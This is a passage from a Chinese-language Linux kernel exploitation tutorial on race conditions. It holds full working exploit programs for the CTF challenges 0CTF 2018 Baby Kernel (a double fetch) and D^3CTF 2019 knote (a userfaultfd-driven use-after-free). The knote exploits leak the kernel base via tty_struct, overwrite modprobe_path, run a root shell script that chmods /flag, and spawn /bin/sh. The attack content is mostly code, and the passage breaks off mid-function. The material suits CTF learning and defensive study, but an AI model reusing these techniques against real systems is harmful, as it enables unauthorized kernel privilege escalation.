        alloc();
        edit(i, VUL_OBJ_SIZE, buf);
    }

    /* checking privilege in child processes */
    puts("[*] notifying child processes and waiting...");
    /* One byte per sprayed child. */
    write(check_root_pipe[1], buf, CRED_SPRAY_NUM);

    sleep(100000000);
    return 0;
}

Race condition

double fetch

用户空间向内核传递数据时，内核先通过 copy_from_user 等拷贝函数将用户数据拷贝至内核空间进行校验及相关处理，但在输入数据较为复杂时，内核可能只引用其指针，而将数据暂时保存在用户空间进行后续处理。此时，该数据存在被其他恶意线程篡改的风险，造成内核验证通过的数据与实际使用的数据不一致，导致内核代码执行异常。
一个典型的 Double Fetch 漏洞原理如下图所示，一个用户态线程准备数据并通过系统调用进入内核，该数据在内核中有两次被取用，内核第一次取用数据进行安全检查（如缓冲区大小、指针可用性等），当检查通过后内核第二次取用数据进行实际处理。而在两次取用数据之间，另一个用户态线程可创造条件竞争，对已通过检查的用户态数据进行篡改，在真实使用时造成访问越界或缓冲区溢出，最终导致内核崩溃或权限提升。

例题：2018 0CTF Finals Baby Kernel

附件下载链接
baby_ioctl 函数有两个功能。

0x6666：打印 flag 的存放地址

if ( request == 0x6666 )
{
  printk("Your flag is at %px! But I don't think you know it's content\n", flag);
  return 0LL;
}

0x1337：检验用户输入的参数地址是否合法以及用户输入的 flag 内容是否正确。如果通过检验则打印 flag 内容。

/*
 * Decompiled range check: returns true when [ptr, ptr + size) is NOT
 * acceptable, i.e. when ptr + size overflows or ends beyond the limit
 * passed in user_space.
 */
bool __fastcall _chk_range_not_ok(void *ptr, __int64 size, void *user_space)
{
  bool carry_flag; // cf
  void *buf_end; // rdi

  /* carry set means ptr + size wrapped around */
  carry_flag = __CFADD__(size, ptr);
  buf_end = (char *)ptr + size;
  return carry_flag || user_space < buf_end;
}

  else if ( request == 0x1337
         && !_chk_range_not_ok(input, sizeof(Input), *(void **)(__readgsqword((unsigned int)&current_task) + 0x1358))
         && !_chk_range_not_ok(input->flag, input->len, *(void **)(__readgsqword((unsigned int)&current_task) + 0x1358))
         && input->len == strlen(flag) )
  {
    for ( i = 0; i < strlen(flag); ++i )
    {
      if ( input->flag[i] != flag[i] )
        return 22LL;
    }
    printk("Looks like the flag is not a secret anymore. So here is it %s\n", flag);
    return 0LL;
  }

调试发现第一次 _chk_range_not_ok 检查结构体范围是否在用户空间。
第二次 _chk_range_not_ok 检查 flag 是否在用户空间。
因此我们可以起一个线程改 flag 指针，可以有一定概率在第二次 _chk_range_not_ok 和校验 flag 之间将 flag 指针指向真正的 flag 从而通过对 flag 的校验。

#include <fcntl.h>
#include <pthread.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/ioctl.h>
#include <unistd.h>

/* Number of ioctl attempts made by the racing main thread. */
#define TRYTIME 0x1000
/* Number of bytes read from the tail of the kernel log dump. */
#define LEN 0x1000

/* Argument of ioctl 0x1337: pointer to the candidate flag and its length. */
struct attr {
    char *flag;
    size_t len;
};

/* Kernel address of the real flag, parsed from the kernel log. */
char *addr;
/* Set to non-zero by the main thread to stop the racing thread. */
int finish = 0;
/* Tail of the kernel log; one extra byte keeps it NUL-terminated. */
char buf[LEN + 1];

/*
 * Racing thread body: keep overwriting the flag pointer of the shared
 * struct attr (passed as s) with the kernel address in addr until finish
 * becomes non-zero.
 *
 * The flag is re-read with an atomic load and the pointer stored with an
 * atomic store on every iteration; with plain accesses the compiler may
 * read finish once and turn this into an endless loop.
 */
void change_attr_value(void *s) {
    struct attr *s1 = s;
    while (__atomic_load_n(&finish, __ATOMIC_ACQUIRE) == 0) {
        __atomic_store_n(&s1->flag, addr, __ATOMIC_RELAXED);
    }
}

/*
 * Double-fetch exploit driver.
 *
 * 1. ioctl 0x6666 makes the driver log the address of the flag.
 * 2. That address is parsed from the tail of the kernel log.
 * 3. A helper thread keeps redirecting t.flag to that address while this
 *    thread resets it to a user-space string and issues ioctl 0x1337 up to
 *    TRYTIME times, hoping the pointer flips after the driver's range check
 *    but before its byte-by-byte comparison.
 * 4. The kernel log is searched for the flag the driver prints on success.
 */
int main(void) {
    int addr_fd;
    char *idx;
    int fd = open("/dev/baby", 0);
    if (fd < 0) {
        perror("[-] open /dev/baby");
        exit(-1);
    }

    ioctl(fd, 0x6666);
    system("dmesg > /tmp/record.txt");
    addr_fd = open("/tmp/record.txt", O_RDONLY);
    if (addr_fd < 0) {
        perror("[-] open /tmp/record.txt");
        exit(-1);
    }
    /* Only the last LEN bytes are needed; a log shorter than LEN makes the
     * seek fail, in which case the file is simply read from its start. */
    if (lseek(addr_fd, -LEN, SEEK_END) == (off_t) -1) {
        lseek(addr_fd, 0, SEEK_SET);
    }
    ssize_t nread = read(addr_fd, buf, LEN);
    close(addr_fd);
    if (nread < 0) {
        perror("[-] read /tmp/record.txt");
        exit(-1);
    }
    buf[nread] = '\0'; /* buf has LEN + 1 bytes, so this is always in range */

    idx = strstr(buf, "Your flag is at ");
    if (idx == NULL) {
        puts("[-] Not found addr");
        exit(-1);
    } else {
        idx += 16; /* strlen("Your flag is at ") */
        addr = (char *) strtoull(idx, NULL, 16);
        printf("[+] flag addr: %p\n", addr);
    }

    pthread_t t1;
    /* NOTE(review): 33 is presumably the length of the real flag, which the
     * driver compares against input->len — confirm for the target. */
    struct attr t = {"flag{fake_flag}", 33};
    if (pthread_create(&t1, NULL, (void *) change_attr_value, &t) != 0) {
        puts("[-] pthread_create failed");
        exit(-1);
    }
    for (int i = 0; i < TRYTIME; i++) {
        /* restore a user-space pointer so the range check can pass again */
        t.flag = "flag{fake_flag}";
        ioctl(fd, 0x1337, &t);
    }
    finish = 1;
    pthread_join(t1, NULL);
    close(fd);
    puts("[+]result is :");
    system("dmesg | grep flag{");
    return 0;
}

userfaultfd

条件竞争的成功利用往往需要正确的顺序，然而若是直接开两个线程进行竞争，命中的几率是比较低的，就比如说前面的 double fetch 尝试 0x1000 次也不一定会命中一次。而 userfaultfd 本身只是一个常规的与处理缺页异常相关的系统调用，但是通过这个机制我们可以控制进程执行流程的先后顺序，从而使得对条件竞争的利用成功率大幅提高。

内核的内存主要有两个区域，RAM和交换区，将要被使用的内存放在RAM，暂时用不到的内存放在交换区，内核控制交换进出的过程。RAM中的地址是物理地址，内核使用虚拟地址，其通过多级页表建立虚拟地址到物理地址的映射。但有的内存既不在RAM又不在交换区，比如mmap出来的内存，这块内存在读写它之前并没有分配实际的物理页。例如：

1	mmap(0x1337000, 0x1000, PROT_READ | PROT_WRITE, MAP_FIXED | MAP_PRIVATE, fd, 0);

内核并未将fd内容拷贝到0x1337000，只是将地址0x1337000映射到文件fd。
比如此时有下列代码运行

1	char c = *(char *) 0x1337000;

可以看到这里在读取数据，但是在实际读取时，由于还没有为 0x1337000 分配物理页，会触发缺页异常，此时内核会进行以下操作：

为 0x1337000 创建物理帧
从 fd 读取内容到 0x1337000（如果是堆空间映射的话，会将对应的物理帧清零）
在页表中创建虚拟地址 0x1337000 到物理地址之间的映射。

userfaultfd 是 linux 下的一种缺页处理机制，该处理机制可以让用户自定义函数来处理缺页异常。下面举一个向缺页处写入数据的例子：

#include <fcntl.h>
#include <linux/userfaultfd.h>
#include <poll.h>
#include <pthread.h>
#include <stdbool.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/ioctl.h>
#include <sys/mman.h>
#include <sys/syscall.h>
#include <sys/types.h>
#include <unistd.h>

int page_size;

/*
 * Thread body that services page faults reported through a userfaultfd.
 *
 * arg  the userfaultfd descriptor, smuggled through the void * argument.
 *
 * Every fault is resolved by filling a private staging page with one letter
 * ('A' plus the fault counter modulo 20) and installing that page at the
 * faulting address with UFFDIO_COPY. The loop never terminates on its own;
 * any failure ends the whole process.
 */
static void *fault_handler_thread(void *arg) {
    static char *page = NULL;   /* staging page holding the bytes to install */
    static struct uffd_msg msg; /* most recent event read from the descriptor */
    static int fault_cnt = 0;   /* number of faults handled so far */
    const int fd = (int) (long) arg;

    /* Map the staging page once, on first entry. */
    if (page == NULL) {
        page = mmap(NULL, page_size, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
        if (page == MAP_FAILED) {
            puts("[-] Error at: mmap");
            exit(-1);
        }
        printf("[*] mmap addr: %p\n", page);
    }

    for (;;) {
        /* Block until the userfaultfd has an event for us. */
        struct pollfd waiter;
        waiter.fd = fd;
        waiter.events = POLLIN;
        int nready = poll(&waiter, 1, -1);
        if (nready == -1) {
            puts("[-] Error at: poll");
            exit(-1);
        }

        /* Report what poll() saw. */
        puts("\nfault_handler_thread():");
        printf("    poll() returns: nready = %d; POLLIN = %d; POLLERR = %d\n",
               nready, (waiter.revents & POLLIN) != 0, (waiter.revents & POLLERR) != 0);

        /* Fetch the event itself. */
        ssize_t nread = read(fd, &msg, sizeof(msg));
        if (nread == 0) {
            puts("[-] EOF on userfaultfd!");
            exit(EXIT_FAILURE);
        }
        if (nread == -1) {
            puts("[-] Error at: read");
            exit(-1);
        }

        /* Only page-fault events are expected on this descriptor. */
        if (msg.event != UFFD_EVENT_PAGEFAULT) {
            puts("[-] Unexpected event on userfaultfd");
            exit(EXIT_FAILURE);
        }

        /* Show the details of the fault. */
        printf("    UFFD_EVENT_PAGEFAULT event: ");
        printf("flags = 0x%llx; ", msg.arg.pagefault.flags);
        printf("address = 0x%llx\n", msg.arg.pagefault.address);

        /* User-defined part: decide what the faulting page should contain. */
        memset(page, 'A' + fault_cnt % 20, page_size);
        fault_cnt++;

        /* Install the staging page at the page-aligned fault address. */
        struct uffdio_copy copy_req;
        copy_req.mode = 0;
        copy_req.copy = 0;
        copy_req.len = page_size;
        copy_req.src = (unsigned long) page;
        copy_req.dst = (unsigned long) msg.arg.pagefault.address & ~(page_size - 1);
        if (ioctl(fd, UFFDIO_COPY, &copy_req) == -1) {
            puts("[-] Error at: ioctl-UFFDIO_COPY");
            exit(-1);
        }
        printf("        (uffdio_copy.copy returned %lld)\n", copy_req.copy);
    }
}

/*
 * userfaultfd demonstration: register one anonymous page with a userfaultfd,
 * start the handler thread, then read from the page so that the first access
 * faults and is resolved by the handler.
 */
int main() {
    struct uffdio_api api_req;
    struct uffdio_register reg_req;
    pthread_t handler_tid;

    /* Query the page size; the handler thread reads it from the global. */
    page_size = (int) sysconf(_SC_PAGE_SIZE);

    printf("[*] page size: 0x%x\n", page_size);

    /* Create the userfaultfd through the raw system call. */
    long uffd = syscall(__NR_userfaultfd, O_CLOEXEC | O_NONBLOCK);
    if (uffd == -1) {
        puts("Error at: userfaultfd");
        exit(-1);
    }

    /* Handshake on the API version. */
    api_req.api = UFFD_API;
    api_req.features = 0;
    if (ioctl((int) uffd, UFFDIO_API, &api_req) == -1) {
        puts("Error at: ioctl-UFFDIO_API");
        exit(-1);
    }

    /* Reserve one page of virtual memory; it is not touched here. */
    char *addr = (char *) mmap(NULL, page_size, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (addr == MAP_FAILED) {
        puts("Error at: mmap");
        exit(-1);
    }

    printf("[*] mmap addr: 0x%lx\n", (size_t) addr);

    /* Register exactly that page for missing-page faults. */
    reg_req.mode = UFFDIO_REGISTER_MODE_MISSING;
    reg_req.range.len = page_size;
    reg_req.range.start = (unsigned long) addr;
    if (ioctl((int) uffd, UFFDIO_REGISTER, &reg_req) == -1) {
        puts("Error at: ioctl-UFFDIO_REGISTER");
        exit(-1);
    }

    /* Start the thread that will resolve faults on the registered range. */
    if (pthread_create(&handler_tid, NULL, fault_handler_thread, (void *) uffd) != 0) {
        puts("Error at: pthread_create");
        exit(-1);
    }

    /* First access to the page: this is what triggers the fault. */
    size_t ptr = *(unsigned long long *) addr;
    printf("[*] Get data: 0x%lx\n", ptr);

    return 0;
}

运行结果如图，自定义的缺页处理函数向缺页处写入了数据。
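需要说明的是，自从 5.11 版本起内核 fs/userfaultfd.c 中全局变量 sysctl_unprivileged_userfaultfd 的默认值由 1 改为 0，这意味着默认情况下非特权用户无法再用 userfaultfd 处理内核态触发的缺页（只能以 UFFD_USER_MODE_ONLY 方式处理用户态缺页），要像上文那样卡住内核中的 copy_from_user/copy_to_user 需要 root 权限（或由管理员将该 sysctl 重新设为 1）。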

不过还有用户空间文件系统（filesystem in userspace，FUSE）可以被用作 userfaultfd 的替代品，帮助我们完成条件竞争的利用。只不过这种方式对环境要求较高，CTF 题目中的环境通常不支持这种利用方式。

例题：D^3CTF2019 - knote

附件下载链接
有 add，dele，edit，get 4种功能，ioctl 不能调用超过 9 次。其中 edit 和 get 没有加锁。
首先是内核地址泄露。利用 userfaultfd 制造条件竞争：在 get 向用户空间拷贝数据的过程中将对应的内存块释放并重新分配为 tty_struct，然后从读出的数据中获取内核基地址。

第二次同理，利用 userfaultfd 构造 UAF 劫持 freelist 修改 modprobe_path 使得修改 flag 文件权限的 shell 脚本以管理员权限执行。

#ifndef _GNU_SOURCE
#define _GNU_SOURCE
#endif

#include <ctype.h>
#include <fcntl.h>
#include <linux/userfaultfd.h>
#include <poll.h>
#include <pthread.h>
#include <sched.h>
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/ioctl.h>
#include <sys/mman.h>
#include <sys/syscall.h>
#include <unistd.h>

/* Size requested for the note that is later replaced by a tty_struct. */
const int TTY_STRUCT_SIZE = 0x2C0;
/* Value the leaked qword is expected to have without KASLR; the kernel
 * offset is computed as (leaked value - DO_SAK_WORK).
 * NOTE(review): presumably the address of do_SAK_work in the target build. */
const size_t DO_SAK_WORK = 0xffffffff815d4ef0;
/* Un-slid address used for modprobe_path; the kernel offset is added at runtime. */
const size_t MODPROBE_PATH = 0xffffffff8245c5c0;

/*
 * Pin the calling process to a single CPU.
 *
 * core  index of the CPU to run on.
 *
 * Failure is reported but not fatal: the caller continues unpinned.
 * NOTE(review): pinning is presumably wanted so that the free and the
 * following allocation are served by the same per-CPU cache — confirm.
 */
void bind_core(int core) {
    cpu_set_t cpu_set;

    CPU_ZERO(&cpu_set);
    CPU_SET(core, &cpu_set);
    if (sched_setaffinity(getpid(), sizeof(cpu_set), &cpu_set) == -1) {
        perror("[-] sched_setaffinity");
    }
}

/*
 * Print a buffer as rows of four 64-bit words followed by an ASCII column.
 *
 * desc  optional heading printed first; skipped when NULL
 * addr  start of the buffer
 * len   buffer size in bytes; only whole 8-byte words get a hex column
 */
void qword_dump(char *desc, void *addr, int len) {
    const uint64_t *words = (const uint64_t *) addr;
    const uint8_t *bytes = (const uint8_t *) addr;
    const int nwords = len / 8;

    if (desc != NULL) {
        printf("[*] %s:\n", desc);
    }
    for (int row = 0; row < nwords; row += 4) {
        const int row_off = row * 8; /* byte offset of this row */

        printf("  %04x", row_off);
        for (int col = 0; col < 4; col++) {
            if (row + col < nwords) {
                printf(" 0x%016lx", words[row + col]);
            } else {
                /* blank cell keeps the ASCII column aligned on a short row */
                printf("                   ");
            }
        }
        printf("   ");
        for (int k = 0; k < 32 && row_off + k < len; k++) {
            const uint8_t ch = bytes[row_off + k];
            printf("%c", isprint(ch) ? ch : '.');
        }
        puts("");
    }
}

/*
 * Range test used to sanity-check a leaked pointer: true when addr lies in
 * [0xFFFFFFFF80000000, 0xFFFFFFFFFEFFFFFF], both ends inclusive.
 */
bool is_kernel_text_addr(size_t addr) {
    if (addr < 0xFFFFFFFF80000000) {
        return false;
    }
    /* A tighter upper bound of 0xFFFFFFFF9FFFFFFF was tried here as well. */
    return addr <= 0xFFFFFFFFFEFFFFFF;
}

char *page;
long page_size;

/*
 * One-shot userfaultfd handler.
 *
 * arg  the userfaultfd descriptor, passed through the void * argument.
 *
 * Waits for a single page fault, stalls for four seconds so that the other
 * process can act while the faulting system call is still blocked, then
 * resolves the fault by copying the global `page` to the faulting page.
 * Returns NULL after that one fault; any failure terminates the process.
 */
void *fault_handler_thread(void *arg) {
    long uffd = (long) arg;

    struct pollfd pollfd;
    pollfd.fd = (int) uffd;
    pollfd.events = POLLIN;
    int nready = poll(&pollfd, 1, -1);
    if (nready == -1) {
        puts("[-] Error at: poll");
        exit(-1);
    }

    static struct uffd_msg msg;
    ssize_t nread = read((int) uffd, &msg, sizeof(msg));
    /* Validate the event before waiting, so failures show up immediately. */
    if (nread == 0) {
        puts("[-] Error at: EOF on userfaultfd!");
        exit(EXIT_FAILURE);
    }
    if (nread == -1) {
        puts("[-] Error at: read");
        exit(-1);
    }
    if (msg.event != UFFD_EVENT_PAGEFAULT) {
        puts("[-] Unexpected event on userfaultfd");
        exit(EXIT_FAILURE);
    }

    /* Hold the faulting thread here; this delay is the race window. */
    sleep(4);

    struct uffdio_copy uffdio_copy;
    uffdio_copy.src = (unsigned long) page;
    uffdio_copy.dst = (unsigned long) msg.arg.pagefault.address & ~(page_size - 1);
    /* dst is an integer field; %p requires a pointer argument. */
    printf("[*] uffdio_copy.dst: %p\n", (void *) (uintptr_t) uffdio_copy.dst);
    uffdio_copy.len = page_size;
    uffdio_copy.mode = 0;
    uffdio_copy.copy = 0;
    if (ioctl((int) uffd, UFFDIO_COPY, &uffdio_copy) == -1) {
        puts("[-] Error at: ioctl-UFFDIO_COPY");
        exit(-1);
    }
    return NULL;
}

/*
 * Create a userfaultfd, register [addr, addr + len) on it for missing-page
 * faults and start `handler` in a new thread with the descriptor as argument.
 *
 * addr     start of the range to monitor
 * len      length of the range in bytes
 * handler  thread routine that will service the faults
 *
 * Any failure prints a message and terminates the process.
 */
void register_userfaultfd(void *addr, size_t len, void *(*handler)(void *)) {
    static pthread_t monitor_thread;
    struct uffdio_api api_req = {.api=UFFD_API, .features=0};
    struct uffdio_register reg_req;
    long uffd;

    uffd = syscall(__NR_userfaultfd, O_CLOEXEC | O_NONBLOCK);
    if (uffd == -1) {
        puts("[-] Error at: userfaultfd");
        exit(-1);
    }

    if (ioctl(uffd, UFFDIO_API, &api_req) == -1) {
        puts("[-] Error at: ioctl-UFFDIO_API");
        exit(-1);
    }

    reg_req.mode = UFFDIO_REGISTER_MODE_MISSING;
    reg_req.range.len = len;
    reg_req.range.start = (unsigned long) addr;
    if (ioctl(uffd, UFFDIO_REGISTER, &reg_req) == -1) {
        puts("[-] Error at: ioctl-UFFDIO_REGISTER");
        exit(-1);
    }

    if (pthread_create(&monitor_thread, NULL, handler, (void *) uffd) != 0) {
        puts("[-] Error at: pthread_create");
        exit(-1);
    }
}

/*
 * Argument block for the knote ioctls. The first word is shared: the add
 * wrapper fills it as a size, the edit/get/delete wrappers as an index.
 */
typedef struct {
    union {
        size_t size;  /* used by chunk_add */
        size_t index; /* used by chunk_edit / chunk_get / chunk_del */
    };
    char *buf;        /* user buffer for chunk_edit / chunk_get */
} Chunk;
long knote_fd; /* descriptor of /dev/knote, opened in main() */

void chunk_add(size_t size) {
    Chunk chunk = {.size=size};
    ioctl((int) knote_fd, 0x1337, &chunk);
}

void chunk_edit(size_t index, char *buf) {
    Chunk chunk = {.index=index, .buf=buf};
    ioctl((int) knote_fd, 0x8888, &chunk);
}

void chunk_get(size_t index, char *buf) {
    Chunk chunk = {.index=index, .buf=buf};
    ioctl((int) knote_fd, 0x2333, &chunk);
}

void chunk_del(size_t index) {
    Chunk chunk = {.index=index};
    ioctl((int) knote_fd, 0x6666, &chunk);
}

/*
 * knote exploit, fork/sleep variant.
 *
 * Stage 1 (skipped when /addr.txt already caches the result): a child frees
 * note 0 and opens /dev/ptmx while the parent's chunk_get() is stalled in the
 * userfaultfd handler, so the parent reads back whatever now occupies the
 * freed slot and derives the kernel offset from qword 86 of it.
 * Stage 2: the same trick with chunk_edit() writes the modprobe_path address
 * into a freed note; two further allocations are made and "/shell.sh" is
 * written through the second one, then an unrecognised executable is run and
 * /flag is probed.
 */
int main() {
    bind_core(0);
    page_size = getpagesize();
    char *buf1 = (char *) mmap(NULL, 0x1000, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    char *buf2 = (char *) mmap(NULL, 0x1000, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (buf1 == MAP_FAILED || buf2 == MAP_FAILED) {
        puts("[-] Error at: mmap");
        exit(-1);
    }
    register_userfaultfd(buf1, 0x1000, (void *) fault_handler_thread);
    register_userfaultfd(buf2, 0x1000, (void *) fault_handler_thread);
    page = malloc(0x1000);
    if (page == NULL) {
        puts("[-] Error at: malloc");
        exit(-1);
    }
    /* The handler copies this whole page into the faulting buffer; start
     * from zeroes instead of whatever malloc() happened to return. */
    memset(page, 0, 0x1000);
    void *kernel_base = (void *) 0xffffffff81000000;
    size_t kernel_offset = 0;
    FILE *addr_fp = fopen("/addr.txt", "r");
    knote_fd = open("/dev/knote", O_RDWR);
    if (knote_fd < 0) {
        puts("[-] Failed to open knote.");
        exit(-1);
    }
    if (addr_fp != NULL) {
        /* Read through unsigned long long so the targets match %llx. */
        unsigned long long cached_base = 0, cached_offset = 0;
        if (fscanf(addr_fp, "%llx %llx", &cached_base, &cached_offset) != 2) {
            puts("[-] Malformed /addr.txt");
            exit(-1);
        }
        fclose(addr_fp);
        kernel_base = (void *) (size_t) cached_base;
        kernel_offset = (size_t) cached_offset;
    } else {
        chunk_add(TTY_STRUCT_SIZE);
        pid_t pid = fork();
        if (pid < 0) {
            puts("[-] FAILED to fork the child");
            exit(-1);
        } else if (pid == 0) {
            puts("[*] Child process sleeping now...");
            sleep(1);
            puts("[*] Child process started.");
            chunk_del(0);
            sleep(1);
            open("/dev/ptmx", O_RDWR);
            puts("[*] Object free and tty got open. Backing parent thread...");
            exit(0);
        } else {
            puts("[*] Parent process trapped in userfaultfd...");
            chunk_get(0, buf1);
            puts("[*] tty struct data obtained");
        }
        qword_dump("leak tty_struct", buf1, TTY_STRUCT_SIZE);
        if (is_kernel_text_addr(((size_t *) buf1)[86])) {
            puts("[+] Successfully hit the tty_struct.");
            kernel_offset = ((size_t *) buf1)[86] - DO_SAK_WORK;
            kernel_base = (void *) ((size_t) kernel_base + kernel_offset);
        } else {
            puts("[-] Failed to hit the tty struct.");
            exit(-1);
        }
        /* Cache the result for later runs; failing to cache is not fatal. */
        addr_fp = fopen("/addr.txt", "w");
        if (addr_fp != NULL) {
            fprintf(addr_fp, "%llx %llx",
                    (unsigned long long) (size_t) kernel_base,
                    (unsigned long long) kernel_offset);
            fclose(addr_fp);
        } else {
            puts("[-] Could not write /addr.txt");
        }
    }

    size_t modprobe_path = MODPROBE_PATH + kernel_offset;
    printf("[*] Kernel offset: %p\n", (void *) kernel_offset);
    printf("[*] Kernel base: %p\n", kernel_base);
    printf("[*] modprobe_path: %p\n", (void *) modprobe_path);
    int probe_fd = open("/shell.sh", O_RDWR);
    if (probe_fd < 0) {
        system("echo '#!/bin/sh' >> /shell.sh");
        system("echo 'chmod 777 /flag' >> /shell.sh");
        system("chmod +x /shell.sh");
    } else {
        close(probe_fd);
    }
    chunk_add(0x100);
    /* First qword of the page the handler will install into buf2. */
    memcpy(page, &modprobe_path, 8);
    pid_t pid = fork();
    if (pid < 0) {
        puts("[-] FAILED to fork the child");
        exit(-1);
    } else if (pid == 0) {
        puts("[*] Child process sleeping now...");
        sleep(1);
        puts("[*] Child process started.");
        chunk_del(0);
        puts("[*] UAF constructed");
        exit(0);
    } else {
        puts("[*] Parent process trapped in userfaultfd...");
        chunk_edit(0, buf2);
        puts("[*] Hijack finished");
    }
    chunk_add(0x100);
    chunk_add(0x100);
    chunk_edit(1, "/shell.sh");
    system("echo -e '\\xff\\xff\\xff\\xff' > /fake");
    system("chmod +x /fake");
    system("/fake");
    probe_fd = open("/flag", O_RDWR);
    if (probe_fd < 0) {
        puts("FAILED to hijack!");
        exit(-1);
    }
    close(probe_fd);
    puts("[+] hijack success");
    system("/bin/sh");
    return 0;
}

上面这种方法构造 Race condition 需要 sleep 效率较低，即使保存泄露的基址避免重复爆破依然需要长时间爆破。
不难想到，可以将子进程的逻辑写到 userfaultfd 的处理函数中，因为页错误发生和处理页错误的顺序是确定的，因此保证了 Race condition 的顺序。这样就可以避免通过 sleep 时长来控制先后顺序。

#ifndef _GNU_SOURCE
#define _GNU_SOURCE
#endif

#include <ctype.h>
#include <fcntl.h>
#include <linux/userfaultfd.h>
#include <poll.h>
#include <pthread.h>
#include <sched.h>
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/ioctl.h>
#include <sys/mman.h>
#include <sys/syscall.h>
#include <unistd.h>

/* Size requested for the note that is later replaced by a tty_struct. */
const int TTY_STRUCT_SIZE = 0x2C0;
/* Starts as the un-slid address; main() adds the leaked kernel offset to it. */
size_t modprobe_path = 0xffffffff8245c5c0;

/*
 * Print a buffer as rows of four 64-bit words followed by an ASCII column.
 *
 * desc  optional heading printed first; skipped when NULL
 * addr  start of the buffer
 * len   buffer size in bytes; only whole 8-byte words get a hex column
 */
void qword_dump(char *desc, void *addr, int len) {
    const uint64_t *words = (const uint64_t *) addr;
    const uint8_t *bytes = (const uint8_t *) addr;
    const int nwords = len / 8;

    if (desc != NULL) {
        printf("[*] %s:\n", desc);
    }
    for (int row = 0; row < nwords; row += 4) {
        const int row_off = row * 8; /* byte offset of this row */

        printf("  %04x", row_off);
        for (int col = 0; col < 4; col++) {
            if (row + col < nwords) {
                printf(" 0x%016lx", words[row + col]);
            } else {
                /* blank cell keeps the ASCII column aligned on a short row */
                printf("                   ");
            }
        }
        printf("   ");
        for (int k = 0; k < 32 && row_off + k < len; k++) {
            const uint8_t ch = bytes[row_off + k];
            printf("%c", isprint(ch) ? ch : '.');
        }
        puts("");
    }
}

/*
 * Range test used to sanity-check a leaked pointer: true when addr lies in
 * [0xFFFFFFFF80000000, 0xFFFFFFFFFEFFFFFF], both ends inclusive.
 */
bool is_kernel_text_addr(size_t addr) {
    if (addr < 0xFFFFFFFF80000000) {
        return false;
    }
    /* A tighter upper bound of 0xFFFFFFFF9FFFFFFF was tried here as well. */
    return addr <= 0xFFFFFFFFFEFFFFFF;
}

/*
 * Pin the calling process to a single CPU.
 *
 * core  index of the CPU to run on.
 *
 * Failure is reported but not fatal: the caller continues unpinned.
 * NOTE(review): pinning is presumably wanted so that the free and the
 * following allocation are served by the same per-CPU cache — confirm.
 */
void bind_core(int core) {
    cpu_set_t cpu_set;

    CPU_ZERO(&cpu_set);
    CPU_SET(core, &cpu_set);
    if (sched_setaffinity(getpid(), sizeof(cpu_set), &cpu_set) == -1) {
        perror("[-] sched_setaffinity");
    }
}

char *page;
long page_size;

/*
 * Create a userfaultfd, register [addr, addr + len) on it for missing-page
 * faults and start `handler` in a new thread with the descriptor as argument.
 *
 * addr     start of the range to monitor
 * len      length of the range in bytes
 * handler  thread routine that will service the faults
 *
 * Any failure prints a message and terminates the process.
 */
void register_userfaultfd(void *addr, size_t len, void *(*handler)(void *)) {
    static pthread_t monitor_thread;
    struct uffdio_api api_req = {.api=UFFD_API, .features=0};
    struct uffdio_register reg_req;
    long uffd;

    uffd = syscall(__NR_userfaultfd, O_CLOEXEC | O_NONBLOCK);
    if (uffd == -1) {
        puts("[-] Error at: userfaultfd");
        exit(-1);
    }

    if (ioctl(uffd, UFFDIO_API, &api_req) == -1) {
        puts("[-] Error at: ioctl-UFFDIO_API");
        exit(-1);
    }

    reg_req.mode = UFFDIO_REGISTER_MODE_MISSING;
    reg_req.range.len = len;
    reg_req.range.start = (unsigned long) addr;
    if (ioctl(uffd, UFFDIO_REGISTER, &reg_req) == -1) {
        puts("[-] Error at: ioctl-UFFDIO_REGISTER");
        exit(-1);
    }

    if (pthread_create(&monitor_thread, NULL, handler, (void *) uffd) != 0) {
        puts("[-] Error at: pthread_create");
        exit(-1);
    }
}

/*
 * Argument block for the knote ioctls. The first word is shared: the add
 * wrapper fills it as a size, the edit/get/delete wrappers as an index.
 */
typedef struct {
    union {
        size_t size;  /* used by chunk_add */
        size_t index; /* used by chunk_edit / chunk_get / chunk_del */
    };
    char *buf;        /* user buffer for chunk_edit / chunk_get */
} Chunk;
long knote_fd; /* descriptor of /dev/knote, opened in main() */

void chunk_add(size_t size) {
    Chunk chunk = {.size=size};
    ioctl((int) knote_fd, 0x1337, &chunk);
}

void chunk_edit(size_t index, char *buf) {
    Chunk chunk = {.index=index, .buf=buf};
    ioctl((int) knote_fd, 0x8888, &chunk);
}

void chunk_get(size_t index, char *buf) {
    Chunk chunk = {.index=index, .buf=buf};
    ioctl((int) knote_fd, 0x2333, &chunk);
}

void chunk_del(size_t index) {
    Chunk chunk = {.index=index};
    ioctl((int) knote_fd, 0x6666, &chunk);
}

/*
 * userfaultfd handler for the leak stage.
 *
 * arg  the userfaultfd descriptor, passed through the void * argument.
 *
 * When the monitored buffer faults, note 0 is deleted and /dev/ptmx is opened
 * 100 times before the fault is resolved, so the stalled system call resumes
 * against whatever now occupies the freed note. The descriptors are left open
 * on purpose. Loops forever; any failure terminates the process.
 *
 * NOTE(review): declared void although it is started through pthread_create
 * via a cast; it never returns, so no return value is ever consumed.
 */
void leak_thread(void *arg) {
    long uffd = (long) arg;
    while (true) {
        struct pollfd pollfd;
        pollfd.fd = (int) uffd;
        pollfd.events = POLLIN;
        int nready = poll(&pollfd, 1, -1);
        if (nready == -1) {
            puts("[-] Error at: poll");
            exit(-1);
        }
        static struct uffd_msg msg;
        ssize_t nread = read((int) uffd, &msg, sizeof(msg));
        if (nread == 0) {
            puts("[-] Error at: EOF on userfaultfd!");
            exit(EXIT_FAILURE);
        }
        if (nread == -1) {
            puts("[-] Error at: read");
            exit(-1);
        }
        if (msg.event != UFFD_EVENT_PAGEFAULT) {
            puts("[-] Unexpected event on userfaultfd");
            exit(EXIT_FAILURE);
        }

        /* Race payload: runs while the faulting thread is still blocked. */
        chunk_del(0);
        for (int i = 0; i < 100; i++) {
            open("/dev/ptmx", O_RDWR);
        }

